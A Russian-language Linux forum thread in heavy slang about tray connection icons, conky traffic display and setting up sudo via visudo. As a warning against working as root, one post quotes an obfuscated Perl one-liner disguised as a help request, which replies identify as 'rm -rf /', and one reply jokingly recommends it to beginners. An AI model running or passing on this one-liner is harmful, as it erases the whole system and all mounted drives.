![]() | ![]() |
![]() | ![]() |
![]() | ![]() ![]() |
Именно штобы иконка соединения в трее активная была?ето как ето активная иконка? типо нажал и оно само может возможность перекодплючятца? увы и ах, по крайней мере в дебе я такого не видел, а как то уже давненько видал гуй для етово в манде, там реально тока кнопку нажал, точку доступа указал и все
![]() | ![]() ![]() |
![]() | ![]() |
ето как ето активная иконка? типо нажал и оно само может возможность перекодплючятца? увы и ах, по крайней мере в дебе я такого не видел, а как то уже давненько видал гуй для етово в манде, там реальнНу иконка соединения внизу, либо вверху у каво как, сообщает што соединения нету. Насчёт трафа спасиба за подсказку
![]() | ![]() ![]() |
Ну иконка соединения внизу, либо вверху у каво как, сообщает што соединения нету. Насчёт трафа спасиба за подсказкуГлянь в теме про пятый сабаен я там снимок своего стола выложил, смотри справа, активность соединений показывают коньки. Если надо конфиг выложу
![]() | ![]() ![]() |
хоть в линуксе дохуя команд в консоли нужно вводить под рутом, нежелательно открыватьсеанс суперпользователя, из соображений безопасности. Вот к примеру уже давненько адин питрасян на лоре типо спрасил у камрадов помащи в некоем коде, што то там не печятало. Собственно, вот код
echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Немало доставило, што некоторые таки сидели в кансоли под рутом и полезли проверять. Сами винаваты, хуле... И незачем патом было в той теме писать разные нехорошие весчи.
Итак, более правильно для запуска прог от имени администратора использовать sudo. Требуетца ввод СВОЕГО пароля. Во многих т.н. юзерфрендли дистрах пользователи автоматом прописаны в /etc/sudoers , в дебиане неапхадимо добавить себя вручную.
Хуй с ним,
su
пароль рута
visudo
В консоли аткроетца редактор с файлом sudoers. Ищем строчку root ALL=(ALL) ALL и ниже добавляем такую же но для своего юзера, например john77 ALL=(ALL) ALL , сохраняем файл как /etc/sudoers ,
в консоли гасим сеанс рута:
exit
Вуаля
![]() | ![]() ![]() |

![]() | ![]() ![]() |
john77, а че тот код делал?

![]() | ![]() |
"rm -rf /"МеготруЪкод. Всем начинающим линуксятнегам саветую

![]() | ![]() ![]() |
![]() | ![]() ![]() |
"rm -rf /"наверно это круто

![]() | ![]() |
Прикол в том што по пизде пойдет не только корневой раздел с системой. А также ВСЕ примонтированые разделы. Короче, считайте што полный формат винтане ври мне. автобота не проведешъ

![]() | ![]() |
но есть апплет "монитор сети" для гнома, ставиш там в свойствах сетевой интерфейс ppp0 и по крайней мере можно следить за работой соединенияaplet пашет, чему я рад, а conky в соединении нули на входящем и исходящем трафе кажет. хотя я его только поставил, ещё разбераццо буду
![]() | ![]() ![]() |
![]() | ![]() ![]() |
aplet пашет, чему я рад, а conky в соединении нули на входящем и исходящем трафе кажет. хотя я его только поставил, ещё разбераццо будув конфиге нужно сетевой интерфейс указывать который у тебя
![]() | ![]() |
Чуваки у меня клава беспроводная, она в биосе не работает,а новую мне покупать лень, поэтому нахуй линухслабак

![]() | ![]() |
в конфиге нужно сетевой интерфейс указывать который у тебяблагадарю, пошарюсь как время будет
![]() | ![]() ![]() |
слабак

![]() | ![]() ![]() |